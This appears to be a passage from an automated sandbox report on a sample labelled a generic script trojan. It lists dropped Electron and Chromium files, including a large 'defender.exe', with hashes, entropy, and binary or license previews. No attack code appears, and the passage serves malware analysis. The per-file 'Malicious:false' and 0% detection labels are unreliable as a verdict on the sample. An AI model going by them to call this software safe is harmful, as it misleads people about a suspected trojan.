                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSE.electron.txt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1096
                                                                    Entropy (8bit):5.13006727705212
                                                                    Encrypted:false
                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                    Malicious:false
                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSES.chromium.html

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):6766160
                                                                    Entropy (8bit):4.735324161006094
                                                                    Encrypted:false
                                                                    SSDEEP:24576:d7rs5kjWSnB3lWNeUmf0f6W6M6q6A6r/HXpErpem:rovj
                                                                    MD5:180F8ACC70405077BADC751453D13625
                                                                    SHA1:35DC54ACAD60A98AEEC47C7ADE3E6A8C81F06883
                                                                    SHA-256:0BFA9A636E722107B6192FF35C365D963A54E1DE8A09C8157680E8D0FBBFBA1C
                                                                    SHA-512:40D3358B35EB0445127C70DEB0CB87EC1313ECA285307CDA168605A4FD3D558B4BE9EB24A59568ECA9EE1F761E578C39B2DEF63AD48E40D31958DB82F128E0EC
                                                                    Malicious:false
                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\chrome_100_percent.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):129690
                                                                    Entropy (8bit):7.91868310789661
                                                                    Encrypted:false
                                                                    SSDEEP:3072:AEKzwqCT4weSxQCS/qGTL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:AEKzwt4hC4/rK18Gb0OV8ld0GecQ3f2
                                                                    MD5:8626E1D68E87F86C5B4DABDF66591913
                                                                    SHA1:4CD7B0AC0D3F72587708064A7B0A3BECA3F7B81C
                                                                    SHA-256:2CAA1DA9B6A6E87BDB673977FEE5DD771591A1B6ED5D3C5F14B024130A5D1A59
                                                                    SHA-512:03BCD8562482009060F249D6A0DD7382FC94D669A2094DEC08E8D119BE51BEF2C3B7B484BB5B7F805AE98E372DAB9383A2C11A63AB0F5644146556B1BB9A4C99
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.I....yp....y6....y.....y#....y.....y`....ym....y.....y.....yI....y.....y'"...y.,...y.7...y;9...yv:...y(<...y.<...y.B...yfH...y.J...y.K...y.L.....M...N...aP...IS...BV...uY...]...Pa....d..&..h..'..i..(.hk..)..l..*..m..+.An..0..n..1.....2.....>.....?.....@.....A.....B.P...C.}...D.....F.9...H.r...I.I...J.....K.....L.....M.....N.6...O.....Q..%..R..(..T..1..U..4..W..>..X..H..^..M.._..N..`.mW..a.._..b..`..c.Cb..d.$d..e.Jg..g..g..i..k..j.*m..k..n..l..p..m..s..n..s..o..u..p..v..r..y..s.|{..u..~..v.<...x.....y.....~.......r..................................8................l.....;..... ......................p.....2..... .....8.....>.......................M.......................^.......................x...r.R...s.....t.....u.K...v.....w.....x.....y.+...z.~...{.....|.....}.a...~.u....._..........._...........l...................................Y.......................;.................R.................w...........6.................].................z.......

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\chrome_200_percent.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):179971
                                                                    Entropy (8bit):7.941375268079628
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rDQYaEQN6AJPrSxQCS/qGTafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/r4:rDQYaNN68rC4/Ygx5GMRejnbdZnVE6YR
                                                                    MD5:48515D600258D60019C6B9C6421F79F6
                                                                    SHA1:0EF0B44641D38327A360AA6954B3B6E5AAB2AF16
                                                                    SHA-256:07BEE34E189FE9A8789AED78EA59AD41414B6E611E7D74DA62F8E6CA36AF01CE
                                                                    SHA-512:B7266BC8ABC55BD389F594DAC0C0641ECF07703F35D769B87E731B5FDF4353316D44F3782A4329B3F0E260DEAD6B114426DDB1B0FB8CD4A51E0B90635F1191D9
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.t....y.....y.....y.....y.....y.....y.....y.%...y.*...y.-...yc5...y.9...y.A...y.V...yCk...y.m...y)o...yyr...y#s...y.}...y.....y....y....y................................K....!.......&.....'....(.Q...).....*.....+.*...0....1.....2.....>.....?.f...@..$..A..&..B..)..C.1/..D.M:..F..<..H.JD..I.-K..J..P..K..V..L..\..M..^..N.Vc..O.?g..Q..p..R..t..T.g|..U.X...W.....X.H...^....._.....`.....a.....b.b...c.....d.....e.....g.....i.....j.....k.....l.....m.....n.....o.....p.....r.....s.....u.....v.....x.....y.....~........*.....+...../.....4.....6.....8....T9.....9....~;.....=....q>.....@.....A....FD.....I.....M.....U.....].....c.....i.....o....Tu.....v.....w.....x.....y.....{.....|.....}..........?.........r.....s.U...t.....u.....v....w.....x....y.*...z.....{....|.<...}.....~.............1...........L..........z.................G...........X...........f.....*..........@.....................q...........Y..........W...........;........................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\d3dcompiler_47.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4891080
                                                                    Entropy (8bit):6.392150637672776
                                                                    Encrypted:false
                                                                    SSDEEP:49152:IuhjwXkKcimPVqB4faGCMhGNYYpQVTxx6k/ftO4w6FXKpOD21pLeXvZCoFwI8ccA:oy904wYbZCoOI85oyI
                                                                    MD5:CB9807F6CF55AD799E920B7E0F97DF99
                                                                    SHA1:BB76012DED5ACD103ADAD49436612D073D159B29
                                                                    SHA-256:5653BC7B0E2701561464EF36602FF6171C96BFFE96E4C3597359CD7ADDCBA88A
                                                                    SHA-512:F7C65BAE4EDE13616330AE46A197EBAD106920DCE6A31FD5A658DA29ED1473234CA9E2B39CC9833FF903FB6B52FF19E39E6397FAC02F005823ED366CA7A34F62
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c..Z....c...c../c....7..c.......c.......c..Z....c..Z...bc..Z....c..Z....c..Z...6c..Z.[..c..Z....c..Rich.c..................PE..d...-L............" ......8.........`.(...................................... K.....2.J...`A..........................................F.x.....F.P.....J.@.....H.......J..!....J......vD.p.....................<.(...P.<.8.............<.(............................text.....8.......8................. ..`.rdata...=....8..@....8.............@..@.data...@.....F.......F.............@....pdata........H.......G.............@..@.rsrc...@.....J.......I.............@..@.reloc........J.......I.............@..B........................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\defender.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):162041856
                                                                    Entropy (8bit):6.7336610434383255
                                                                    Encrypted:false
                                                                    SSDEEP:1572864:QCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:qDAgZi
                                                                    MD5:050F6E0968C055E912AB6CA8DC12A881
                                                                    SHA1:0E1A13AD2DE9C529C001DE16D9402B302F258E4C
                                                                    SHA-256:5B287055469879FCCCA0CC432C3C975BC810D91F882C5CCED68626FEDFC30D14
                                                                    SHA-512:9BDF8E242CC60B583FB751C093612F06DBB001A5DE9DAD369078B6CA0EAED6D51109926D758B46058EBF617A8AFF761C0AF3FDBF1DF4B73264319FDB309A13FA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........."......v.....................@..........................................`...........................................D.od..e.H.T............p..,.@.............`.....:.......................:.(...`...8...........P,H......iD......................text....u.......v.................. ..`.rdata...`k......bk..|..............@..@.data....bE...L.......K.............@....pdata..,.@..p....@...V.............@..@.00cfg..(............J..............@..@.gxfg....B.......B...L..............@..@.retplne.....`...........................rodata......p...................... ..`.tls................................@....voltbl.R...............................CPADinfo8...........................@...LZMADEC............................. ..`_RDATA..............................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..`.......

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\ffmpeg.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):2862080
                                                                    Entropy (8bit):6.7042588011125215
                                                                    Encrypted:false
                                                                    SSDEEP:49152:XMoI7Qj3trgDtcfkW76fSL5Yqq6uthy4Y6NO8PyJegPTagrcjdiCOi2iNN3lzl3U:H3Kk76fUq/4TagreBOirnW
                                                                    MD5:D49E7A8F096AD4722BD0F6963E0EFC08
                                                                    SHA1:6835F12391023C0C7E3C8CC37B0496E3A93A5985
                                                                    SHA-256:F11576BF7FFBC3669D1A5364378F35A1ED0811B7831528B6C4C55B0CDC7DC014
                                                                    SHA-512:CA50C28D6AAC75F749ED62EEC8ACBB53317F6BDCEF8794759AF3FAD861446DE5B7FA31622CE67A347949ABB1098ECCB32689B4F1C54458A125BC46574AD51575
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......".........`.........................................B...........`A..........................................).......).(.............@.x.............A..2..D.).....................(.).(...."#.8.............).P............................text....."......."................. ..`.rdata...t....#..v....".............@..@.data...X.....*.."...n*.............@....pdata..x.....@.......*.............@..@.00cfg..(....@A......B+.............@..@.gxfg....+...PA..,...D+.............@..@.retplne\.....A......p+..................tls..........A......r+.............@....voltbl.8.....A......t+................._RDATA........A......v+.............@..@.reloc...2....A..4...x+.............@..B................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\icudtl.dat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10541296
                                                                    Entropy (8bit):6.277012685259397
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ffPBQYOo+ddlymff2LfPQCvliXUxiG9Ha93Whla6ZENSs285:ffPBhORjfAHliXUxiG9Ha93Whla6ZEV7
                                                                    MD5:ADFD2A259608207F256AEADB48635645
                                                                    SHA1:300BB0AE3D6B6514FB144788643D260B602AC6A4
                                                                    SHA-256:7C8C7B05D70145120B45CCB64BF75BEE3C63FF213E3E64D092D500A96AFB8050
                                                                    SHA-512:8397E74C7A85B0A2987CAE9F2C66CE446923AA4140686D91A1E92B701E16B73A6CE459540E718858607ECB12659BEDAC0AA95C2713C811A2BC2D402691FF29DC
                                                                    Malicious:false
                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libEGL.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):479232
                                                                    Entropy (8bit):6.320849747462847
                                                                    Encrypted:false
                                                                    SSDEEP:12288:su0LAjbIkyVVR8O9v/6TiT5eU3axzvYwo:sub49/6TiQzvYX
                                                                    MD5:09134E6B407083BAAEDF9A8C0BCE68F2
                                                                    SHA1:8847344CCEEAB35C1CDF8637AF9BD59671B4E97D
                                                                    SHA-256:D2107BA0F4E28E35B22837C3982E53784D15348795B399AD6292D0F727986577
                                                                    SHA-512:6FF3ADCB8BE48D0B505A3C44E6550D30A8FEAF4AA108982A7992ED1820C06F49E0AD48D9BD92685FB82783DFD643629BD1FE4073300B61346B63320CBDB051BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ................p.....................................................`A........................................x.......e-..(.......x........B..............$...4...........................(...@1..8............0...............................text...E........................... ..`.rdata..,....0......................@..@.data....K....... ..................@....pdata...B.......D..................@..@.00cfg..(....`......................@..@.gxfg...0$...p...&..................@..@.retplne\............4...................tls....!............6..............@....voltbl.8............8.................._RDATA...............:..............@..@.rsrc...x............<..............@..@.reloc..$............B..............@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\libGLESv2.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):7514112
                                                                    Entropy (8bit):6.462467169487978
                                                                    Encrypted:false
                                                                    SSDEEP:98304:BuT3g23jeZ/02YPuLaw5RoD1rfEQ3CPdOEabcgsOMdi:BuDPTwLap14QzEijsvi
                                                                    MD5:A5F1921E6DCDE9EAF42E2CCC82B3D353
                                                                    SHA1:1F6F4DF99AE475ACEC4A7D3910BADB26C15919D1
                                                                    SHA-256:50C4DC73D69B6C0189EAB56D27470EE15F99BBBC12BFD87EBE9963A7F9BA404E
                                                                    SHA-512:0C24AE7D75404ADF8682868D0EBF05F02BBF603F7DDD177CF2AF5726802D0A5AFCF539DC5D68E10DAB3FCFBA58903871C9C81054560CF08799AF1CC88F33C702
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......X..........L.......................................s...........`A..........................................j.....N.j.d.....r.......o.PJ............r.....$.i.......................i.(.....X.8...........P.k.......j.@....................text.....X.......X................. ..`.rdata........X.......X.............@..@.data.........k..|....k.............@....pdata..PJ....o..L...No.............@..@.00cfg..(....0r.......q.............@..@.gxfg...p*...@r..,....q.............@..@.retplne\....pr.......q..................tls....:.....r.......q.............@....voltbl.D.....r.......q................._RDATA........r.......q.............@..@.rsrc.........r.......q.............@..@.reloc........r.......q.............@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\af.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):362355
                                                                    Entropy (8bit):5.4138809970208035
                                                                    Encrypted:false
                                                                    SSDEEP:6144:j54QCpN9/WiHIR9a5D4+kQMGSB+jC6kAw1TUKKpg3b9xIsVxSt2y5qP3ux5tPwDV:F9CpN9OiHIRX+HMT+jC6kAw1TYpg3b9P
                                                                    MD5:464E5EEABA5EFF8BC93995BA2CB2D73F
                                                                    SHA1:3B216E0C5246C874AD0AD7D3E1636384DAD2255D
                                                                    SHA-256:0AD547BB1DC57907ADEB02E1BE3017CCE78F6E60B8B39395FE0E8B62285797A1
                                                                    SHA-512:726D6C41A9DBF1F5F2EFF5B503AB68D879B088B801832C13FBA7EB853302B16118CACDA4748A4144AF0F396074449245A42B2FE240429B1AFCB7197FA0CB6D41
                                                                    Malicious:false
                                                                    Preview:..........].h.(...i.0...j.<...k.K...l.V...n.^...o.c...p.p...r.v...s.....t.....v.....w.....y.....z.....|.....}................................................................... .....M.....Z.....i.....z...........................................................!.....4.....T.....[.....k.....{...........................................................$.....4.....B.....x.............................................................................2.....K.....g.....u.....}........................................................... .....0.....L.....a.......................................................................9.....N.....g.....n.....q.....r.....~.........................................D.....L.......................................................................'.....<.....^.....q................................................... .....".....%.D...(.`...*.....+.....,.........../.....0.....1.....3.....4.+...5.F...6.....7.....8.....9.....<.....=.....>.....?.....@.....A.8...C.`...D.g.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\am.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):583572
                                                                    Entropy (8bit):4.947180410657857
                                                                    Encrypted:false
                                                                    SSDEEP:12288:QqhqEuPxT8xZTtWosuF9Q5m9yAAVzfukCQox30jH8+I:Zh8T8xTWoZF9Q5m9yAAVzXCQ0
                                                                    MD5:2C933F084D960F8094E24BEE73FA826C
                                                                    SHA1:91DFDDC2CFF764275872149D454A8397A1A20AB1
                                                                    SHA-256:FA1E44215BD5ACC7342C431A3B1FDDB6E8B6B02220B4599167F7D77A29F54450
                                                                    SHA-512:3C9ECFB0407DE2AA6585F4865AD54EEB2EC6519C9D346E2D33ED0E30BE6CC3EBFED676A08637D42C2CA8FA6CFEFB4091FEB0C922FF71F09A2B89CDD488789774
                                                                    Malicious:false
                                                                    Preview:..........Q.h.@...i.K...j.W...k.f...l.q...n.y...o.~...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................&.....-.....4.....5.....6.....;.....g........................................./.....7.....|...............................................A.....a.....q............................./.....R.....d.....m.............................4.....@.....O.....e...............................................I.....{............................................... .....3.....h.....w.............................:.....R.............................).....H.....n.....q.......................'.....G.....p.....w.....z.....{.........................................l.................".....B....._.....................................................;.....c.................).....u....................................... .....".0...%.f...(.....*.....+.....,.........../.....0.1...1.....3.....4.....5.....6.{...7.....8.....9.....;.....<.....=.5...>.o...?.y...@.....A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ar.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):639744
                                                                    Entropy (8bit):4.950537001099058
                                                                    Encrypted:false
                                                                    SSDEEP:12288:K+sgtqIj5/XvYUtOkQIkqBJ5SNbW+eTtvZEMgSENjM:KD4Fek75z+K
                                                                    MD5:FDBAD4C84AC66EE78A5C8DD16D259C43
                                                                    SHA1:3CE3CD751BB947B19D004BD6916B67E8DB5017AC
                                                                    SHA-256:A62B848A002474A8EA37891E148CBAF4AF09BDBA7DAFEBDC0770C9A9651F7E3B
                                                                    SHA-512:376519C5C2E42D21ACEDB1EF47184691A2F286332451D5B8D6AAC45713861F07C852FB93BD9470FF5EE017D6004ABA097020580F1BA253A5295AC1851F281E13
                                                                    Malicious:false
                                                                    Preview:........~.z.h.....i.....j.....k.....l.....n.'...o.,...p.9...r.?...s.P...t.Y...v.n...w.{...y.....z.....|.....}...................................................................).....B....._.........................................-....._.....b.....f.........................................0.....G...................................................../.....O...............................................-.....7.....g.............................5.....`...............................................K.....[.....r.............................a.........................................".....=.....\.....w.................................................................V.......................o.............................<.....Y.....i.....q.....}.......................<.....^.........................................<.....M... ._...".|...%.....(.....*.M...+.P...,.n........./.....0.....1.....3.....4.=...5.d...6.....7.....8.....9.6...;.Q...<.r...=.....>.....?.....@.....A.....C.....D.....E.Y...F...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\bg.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):667826
                                                                    Entropy (8bit):4.715111408941832
                                                                    Encrypted:false
                                                                    SSDEEP:12288:MMq8w2kMLlYrdAs1aQUx41aVVwslMLOmFOMw35uKN31tfbDMxbV2Jfu64Kjz5fS+:MMqckulYrdAs1aQUmBsmRw35uK7Jgxho
                                                                    MD5:38BCABB6A0072B3A5F8B86B693EB545D
                                                                    SHA1:D36C8549FE0F69D05FFDAFFA427D3DDF68DD6D89
                                                                    SHA-256:898621731AC3471A41F8B3A7BF52E7F776E8928652B37154BC7C1299F1FD92E1
                                                                    SHA-512:002ADBDC17B6013BECC4909DAF2FEBB74CE88733C78E968938B792A52C9C5A62834617F606E4CB3774AE2DAD9758D2B8678D7764BB6DCFE468881F1107DB13EF
                                                                    Malicious:false
                                                                    Preview:..........S.h.<...i.D...j.P...k._...l.j...n.r...o.w...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....4.........................................:.....F.....P.........................................Q.....]...................................,.....V.........................................7...................................9.....?.....M.....a.......................9.....i.........................................(.....N.....x.......................=.....X.....n.......................Z.....s...................................8.....h.......................+.....2.....5.....6.....J.....`.....|.................(...........B.....N.................>...................................,.....6.....j.................7.....s.................?.....Q.....g..................... .....".....%.U...(.....*.....+.....,....... .../.N...0.W...1.....3.....4.....5.N...6.....7.....8.....9.@...;.m...<.....=.....>.....?.....@.....A.D...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\bn.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):858553
                                                                    Entropy (8bit):4.32277927640417
                                                                    Encrypted:false
                                                                    SSDEEP:3072:6gGTLRFbMdhBVHvr5eSnC6PRWhk7Bbd8+D95H0XluZ:YWBlvr5FCYRWuBbdB5wl2
                                                                    MD5:9340520696E7CB3C2495A78893E50ADD
                                                                    SHA1:EED5AEEF46131E4C70CD578177C527B656D08586
                                                                    SHA-256:1EA245646A4B4386606F03C8A3916A3607E2ADBBC88F000976BE36DB410A1E39
                                                                    SHA-512:62507685D5542CFCD394080917B3A92CA197112FEEA9C2DDC1DFC77382A174C7DDF758D85AF66CD322692215CB0402865B2A2B212694A36DA6B592028CAAFCDF
                                                                    Malicious:false
                                                                    Preview:..........].h.(...i.9...j.E...k.T...l._...n.g...o.m...p.z...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................!.....(.....).....*...../.......................9.....K.....g.............................R.....T.....X.......................&.....[.............................E.....x.......................-.....O.....}.................e.....t.........................................5.....q.................2.....r.........................................-.....I.......................x...............................................@.....r.............................5.....c...............................................6.....M.....n.................1.....I.......................f.........................................@.................i...............................................J.....h... .}...".....%.....(.P...*.....,.........../.....0.....1.....3.....4.....5.^...6.....7.....8.u...9.....;.....<.....=.....>.R...?.e...@.....A.....C.c...D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ca.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):409695
                                                                    Entropy (8bit):5.417085582145732
                                                                    Encrypted:false
                                                                    SSDEEP:12288:bgoRVrijIs3cejEYBCqS4o3nbhjJSwHQliEwfwVEMXdLbpuQ16BtryBiGIle3nei:b3GQUwJAMNTCypxB5WMml
                                                                    MD5:4CD6B3A91669DDCFCC9EEF9B679AB65C
                                                                    SHA1:43C41CB00067DE68D24F72E0F5C77D3B50B71F83
                                                                    SHA-256:56EFFF228EE3E112357D6121B2256A2C3ACD718769C89413DE82C9D4305459C6
                                                                    SHA-512:699BE9962D8AAE241ABD1D1F35CD8468FFBD6157BCD6BDF2C599D902768351B247BAAD6145B9826D87271FD4A19744EB11BF7065DB7FEFB01D66D2F1F39015A9
                                                                    Malicious:false
                                                                    Preview:..........R.h.>...i.F...j.R...k.a...l.l...n.t...o.y...p.....r.....s.....t.....v.....w.....y.....z.....|.....}.....................................!.....(...../.....0.....1.....3.....\.....v...............................................&.....D.....F.....J.....r.....................................................%.....5.....S.....n.....q.....{.........................................%.....5.....8.....;.....D.....X.....n.....................................................#.....5.....D.....U.....k.....r...................................'.....H.....Q.....b.....u.....................................................).....0.....3.....4.....=.....F.....N.....T.....f.................,.....4.....o.........................................$...../.....4.....J.....t.............................%.....>.....C.....M.....^.....z......... .....".....%.....(.....*.....+.....,.&.....P.../.m...0.r...1.....3.....4.....5.....6.1...7.B...8.V...9.h...;.v...<.....=.....>.....?.....@.....A.....C.....D.&...E.Z.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\cs.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):419829
                                                                    Entropy (8bit):5.845882900283008
                                                                    Encrypted:false
                                                                    SSDEEP:6144:RquUIAMYOnQYeAIV4g558YwGKNDsku8Qy:Rq/IA5On504g558YwbNDsC
                                                                    MD5:EEEE212072EA6589660C9EB216855318
                                                                    SHA1:D50F9E6CA528725CED8AC186072174B99B48EA05
                                                                    SHA-256:DE92F14480770401E39E22DCF3DD36DE5AD3ED22E44584C31C37CD99E71C4A43
                                                                    SHA-512:EA068186A2E611FB98B9580F2C5BA6FD1F31B532E021EF9669E068150C27DEEE3D60FD9FF7567B9EB5D0F98926B24DEFABC9B64675B49E02A6F10E71BB714AC8
                                                                    Malicious:false
